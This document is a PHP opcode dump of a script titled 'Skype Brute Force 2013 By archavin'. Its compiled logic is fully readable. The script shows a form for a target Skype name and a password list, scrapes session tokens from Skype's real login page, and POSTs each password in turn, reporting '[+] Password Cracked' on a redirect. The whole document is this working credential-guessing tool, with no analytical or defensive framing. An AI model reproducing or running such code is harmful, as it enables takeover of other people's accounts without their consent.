Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 43, Position 2 = 53
Branch analysis from position: 43
2 jumps found. (Code = 77) Position 1 = 44, Position 2 = 52
Branch analysis from position: 44
2 jumps found. (Code = 78) Position 1 = 45, Position 2 = 52
Branch analysis from position: 45
1 jumps found. (Code = 42) Position 1 = 44
Branch analysis from position: 44
Branch analysis from position: 52
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 52
Branch analysis from position: 53
filename: /in/UfDrX
function name: (null)
number of ops: 55
compiled vars: !0 = $skype, !1 = $username, !2 = $password, !3 = $time, !4 = $date, !5 = $header, !6 = $xsec, !7 = $token, !8 = $pie, !9 = $etm, !10 = $pass
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
1 0 E > ECHO '%3Cform+method%3D%27POST%27%3E%0A%3Ctitle%3ESkype+Brute+Force+2013+By+archavin%3C%2Ftitle%3E%0A%3Ccenter%3E%0A%3Cimg+src%3D%27http%3A%2F%2Fwww.promusicacademy.com%2Fwp-content%2Fuploads%2F2012%2F11%2FSkype-icon.png%27%3E%3Cbr%3E%0A%3Cinput+type%3D%27text%27+name%3D%27skypename%27+placeholder%3D%27Skype+Name%27+size%3D%2738%27%3E%3Cbr%3E%0A%3Ctextarea+rows%3D%2716%27+cols%3D%2738%27+name%3D%27passwords%27+placeholder%3D%27passwords%27%3E%3C%2Ftextarea%3E%3Cbr%3E%0A%3Cinput+type%3D%27submit%27+value%3D%27Start+Brute%27+name%3D%27brute%27%3E%3Cbr%3E%0A%3C%2Fcenter%3E%0A%3C%2Fform%3E%0A'
11 1 BEGIN_SILENCE ~11
2 INIT_FCALL 'set_time_limit'
3 SEND_VAL 0
4 DO_ICALL
5 END_SILENCE ~11
17 6 ASSIGN !0, 'https%3A%2F%2Flogin.skype.com%2Flogin%3Fapplication%3Daccount%26return_url%3Dhttps%253A%252F%252Fsecure.skype.com%252Faccount%252Flogin'
19 7 FETCH_R global ~14 '_POST'
8 FETCH_DIM_R ~15 ~14, 'skypename'
9 ASSIGN !1, ~15
20 10 INIT_FCALL 'explode'
11 SEND_VAL '%0D%0A'
12 FETCH_R global ~17 '_POST'
13 FETCH_DIM_R ~18 ~17, 'passwords'
14 SEND_VAL ~18
15 DO_ICALL $19
16 ASSIGN !2, $19
23 17 INIT_FCALL 'date_default_timezone_set'
18 SEND_VAL 'Asia%2FRiyadh'
19 DO_ICALL $21
20 ASSIGN !3, $21
24 21 INIT_FCALL 'date'
22 SEND_VAL 'H%3Ai%3As'
23 DO_ICALL $23
24 ASSIGN !4, $23
27 25 ASSIGN !5, 'HTTP%2F1.1+302'
48 26 INIT_FCALL 'explode'
27 SEND_VAL '%7C%3A%7C'
28 INIT_FCALL 'xsecurity'
29 SEND_VAR !0
30 DO_FCALL 0 $26
31 SEND_VAR $26
32 DO_ICALL $27
33 ASSIGN !6, $27
49 34 FETCH_DIM_R ~29 !6, 0
35 ASSIGN !7, ~29
50 36 FETCH_DIM_R ~31 !6, 1
37 ASSIGN !8, ~31
51 38 FETCH_DIM_R ~33 !6, 2
39 ASSIGN !9, ~33
72 40 FETCH_R global ~35 '_POST'
41 FETCH_DIM_R ~36 ~35, 'brute'
42 > JMPZ ~36, ->53
74 43 > > FE_RESET_R $37 !2, ->52
44 > > FE_FETCH_R $37, !10, ->52
76 45 > INIT_FCALL 'brute'
46 SEND_VAR !0
47 SEND_VAR !1
48 SEND_VAR !10
49 SEND_VAR !5
50 DO_FCALL 0
74 51 > JMP ->44
52 > FE_FREE $37
79 53 > ECHO '%3Ccenter%3E%3Cbr%3E%3Cfont+face%3D%27Tahoma%27+size%3D%275%27+color%3D%27red%27%3ECoded+By+%3A+archavin++cyberizm.org%3C%2Ffont%3E%3C%2Fcenter%3E'
80 54 > RETURN 1
Function xsecurity:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/UfDrX
function name: xsecurity
number of ops: 80
compiled vars: !0 = $skype, !1 = $ch, !2 = $run, !3 = $hash, !4 = $piie, !5 = $etmm
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
30 0 E > RECV !0
32 1 INIT_FCALL_BY_NAME 'curl_init'
2 DO_FCALL 0 $6
3 ASSIGN !1, $6
33 4 INIT_FCALL_BY_NAME 'curl_setopt'
5 SEND_VAR_EX !1
6 FETCH_CONSTANT ~8 'CURLOPT_URL'
7 SEND_VAL_EX ~8
8 SEND_VAR_EX !0
9 DO_FCALL 0
34 10 INIT_FCALL_BY_NAME 'curl_setopt'
11 SEND_VAR_EX !1
12 FETCH_CONSTANT ~10 'CURLOPT_SSL_VERIFYPEER'
13 SEND_VAL_EX ~10
14 SEND_VAL_EX <false>
15 DO_FCALL 0
35 16 INIT_FCALL_BY_NAME 'curl_setopt'
17 SEND_VAR_EX !1
18 FETCH_CONSTANT ~12 'CURLOPT_HEADER'
19 SEND_VAL_EX ~12
20 SEND_VAL_EX 1
21 DO_FCALL 0
36 22 INIT_FCALL_BY_NAME 'curl_setopt'
23 SEND_VAR_EX !1
24 FETCH_CONSTANT ~14 'CURLOPT_POST'
25 SEND_VAL_EX ~14
26 SEND_VAL_EX 1
27 DO_FCALL 0
37 28 INIT_FCALL_BY_NAME 'curl_setopt'
29 SEND_VAR_EX !1
30 FETCH_CONSTANT ~16 'CURLOPT_COOKIEJAR'
31 SEND_VAL_EX ~16
32 INIT_FCALL 'getcwd'
33 DO_ICALL $17
34 CONCAT ~18 $17, '.%2Fcookie.txt'
35 SEND_VAL_EX ~18
36 DO_FCALL 0
38 37 INIT_FCALL_BY_NAME 'curl_setopt'
38 SEND_VAR_EX !1
39 FETCH_CONSTANT ~20 'CURLOPT_COOKIEFILE'
40 SEND_VAL_EX ~20
41 INIT_FCALL 'getcwd'
42 DO_ICALL $21
43 CONCAT ~22 $21, '.%2Fcookie.txt'
44 SEND_VAL_EX ~22
45 DO_FCALL 0
39 46 INIT_FCALL_BY_NAME 'curl_setopt'
47 SEND_VAR_EX !1
48 FETCH_CONSTANT ~24 'CURLOPT_RETURNTRANSFER'
49 SEND_VAL_EX ~24
50 SEND_VAL_EX 1
51 DO_FCALL 0
40 52 INIT_FCALL_BY_NAME 'curl_exec'
53 SEND_VAR_EX !1
54 DO_FCALL 0 $26
55 ASSIGN !2, $26
41 56 INIT_FCALL 'preg_match'
57 SEND_VAL '%2F%3Cinput+type%3D%22hidden%22+name%3D%22session_token%22+value%3D%22%28.%2A%3F%29%22%2F'
58 SEND_VAR !2
59 SEND_REF !3
60 DO_ICALL
42 61 INIT_FCALL 'preg_match'
62 SEND_VAL '%2F%3Cinput+type%3D%22hidden%22+name%3D%22pie%22+id%3D%22pie%22+value%3D%22%28.%2A%3F%29%22%2F'
63 SEND_VAR !2
64 SEND_REF !4
65 DO_ICALL
43 66 INIT_FCALL 'preg_match'
67 SEND_VAL '%2F%3Cinput+type%3D%22hidden%22+name%3D%22etm%22+id%3D%22etm%22+value%3D%22%28.%2A%3F%29%22%2F'
68 SEND_VAR !2
69 SEND_REF !5
70 DO_ICALL
44 71 FETCH_DIM_R ~31 !3, 1
72 CONCAT ~32 ~31, '%7C%3A%7C'
73 FETCH_DIM_R ~33 !4, 1
74 CONCAT ~34 ~32, ~33
75 CONCAT ~35 ~34, '%7C%3A%7C'
76 FETCH_DIM_R ~36 !5, 1
77 CONCAT ~37 ~35, ~36
78 > RETURN ~37
45 79* > RETURN null
End of function xsecurity
Function brute:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 83, Position 2 = 89
Branch analysis from position: 83
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 89
filename: /in/UfDrX
function name: brute
number of ops: 91
compiled vars: !0 = $skype, !1 = $username, !2 = $pass, !3 = $header, !4 = $ch, !5 = $pie, !6 = $etm, !7 = $date, !8 = $token, !9 = $brute
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
54 0 E > RECV !0
1 RECV !1
2 RECV !2
3 RECV !3
56 4 INIT_FCALL_BY_NAME 'curl_init'
5 DO_FCALL 0 $10
6 ASSIGN !4, $10
57 7 INIT_FCALL_BY_NAME 'curl_setopt'
8 SEND_VAR_EX !4
9 FETCH_CONSTANT ~12 'CURLOPT_URL'
10 SEND_VAL_EX ~12
11 SEND_VAR_EX !0
12 DO_FCALL 0
58 13 INIT_FCALL_BY_NAME 'curl_setopt'
14 SEND_VAR_EX !4
15 FETCH_CONSTANT ~14 'CURLOPT_SSL_VERIFYPEER'
16 SEND_VAL_EX ~14
17 SEND_VAL_EX <false>
18 DO_FCALL 0
59 19 INIT_FCALL_BY_NAME 'curl_setopt'
20 SEND_VAR_EX !4
21 FETCH_CONSTANT ~16 'CURLOPT_HEADER'
22 SEND_VAL_EX ~16
23 SEND_VAL_EX 1
24 DO_FCALL 0
60 25 INIT_FCALL_BY_NAME 'curl_setopt'
26 SEND_VAR_EX !4
27 FETCH_CONSTANT ~18 'CURLOPT_POST'
28 SEND_VAL_EX ~18
29 SEND_VAL_EX 1
30 DO_FCALL 0
61 31 INIT_FCALL_BY_NAME 'curl_setopt'
32 SEND_VAR_EX !4
33 FETCH_CONSTANT ~20 'CURLOPT_POSTFIELDS'
34 SEND_VAL_EX ~20
35 ROPE_INIT 13 ~22 'username%3D'
36 ROPE_ADD 1 ~22 ~22, !1
37 ROPE_ADD 2 ~22 ~22, '%26password%3D'
38 ROPE_ADD 3 ~22 ~22, !2
39 ROPE_ADD 4 ~22 ~22, '%26timezone_field%3D%252B03%257C00%26pie%3D'
40 ROPE_ADD 5 ~22 ~22, !5
41 ROPE_ADD 6 ~22 ~22, '%26etm%3D'
42 ROPE_ADD 7 ~22 ~22, !6
43 ROPE_ADD 8 ~22 ~22, '%26js_time%3D'
44 ROPE_ADD 9 ~22 ~22, !7
45 ROPE_ADD 10 ~22 ~22, '%26session_token%3D'
46 ROPE_ADD 11 ~22 ~22, !8
47 ROPE_END 12 ~21 ~22, '%26application%3Daccount%26return_url%3Dhttps%253A%252F%252Fsecure.skype.com%252Faccount%252Flogin'
48 SEND_VAL_EX ~21
49 DO_FCALL 0
62 50 INIT_FCALL_BY_NAME 'curl_setopt'
51 SEND_VAR_EX !4
52 FETCH_CONSTANT ~30 'CURLOPT_COOKIEJAR'
53 SEND_VAL_EX ~30
54 INIT_FCALL 'getcwd'
55 DO_ICALL $31
56 CONCAT ~32 $31, '.%2Fcookie.txt'
57 SEND_VAL_EX ~32
58 DO_FCALL 0
63 59 INIT_FCALL_BY_NAME 'curl_setopt'
60 SEND_VAR_EX !4
61 FETCH_CONSTANT ~34 'CURLOPT_COOKIEFILE'
62 SEND_VAL_EX ~34
63 INIT_FCALL 'getcwd'
64 DO_ICALL $35
65 CONCAT ~36 $35, '.%2Fcookie.txt'
66 SEND_VAL_EX ~36
67 DO_FCALL 0
64 68 INIT_FCALL_BY_NAME 'curl_setopt'
69 SEND_VAR_EX !4
70 FETCH_CONSTANT ~38 'CURLOPT_RETURNTRANSFER'
71 SEND_VAL_EX ~38
72 SEND_VAL_EX 1
73 DO_FCALL 0
65 74 INIT_FCALL_BY_NAME 'curl_exec'
75 SEND_VAR_EX !4
76 DO_FCALL 0 $40
77 ASSIGN !9, $40
66 78 INIT_FCALL 'strstr'
79 SEND_VAR !9
80 SEND_VAR !3
81 DO_ICALL $42
82 > JMPZ $42, ->89
68 83 > ROPE_INIT 5 ~44 '%3Cfont+face%3D%27Tahoma%27+size%3D%272%27%3E%3Ccenter%3E%5B%2B%5D+Password+Cracked+is+%3Cb%3E'
84 ROPE_ADD 1 ~44 ~44, !2
85 ROPE_ADD 2 ~44 ~44, '%3C%2Fb%3E+--%3E+%3Cb%3E'
86 ROPE_ADD 3 ~44 ~44, !1
87 ROPE_END 4 ~43 ~44, '%3C%2Fb%3E%3C%2Ffont%3E%3C%2Fcenter%3E'
88 ECHO ~43
70 89 > > RETURN !9
71 90* > RETURN null
End of function brute
Generated using Vulcan Logic Dumper, using php 8.0.0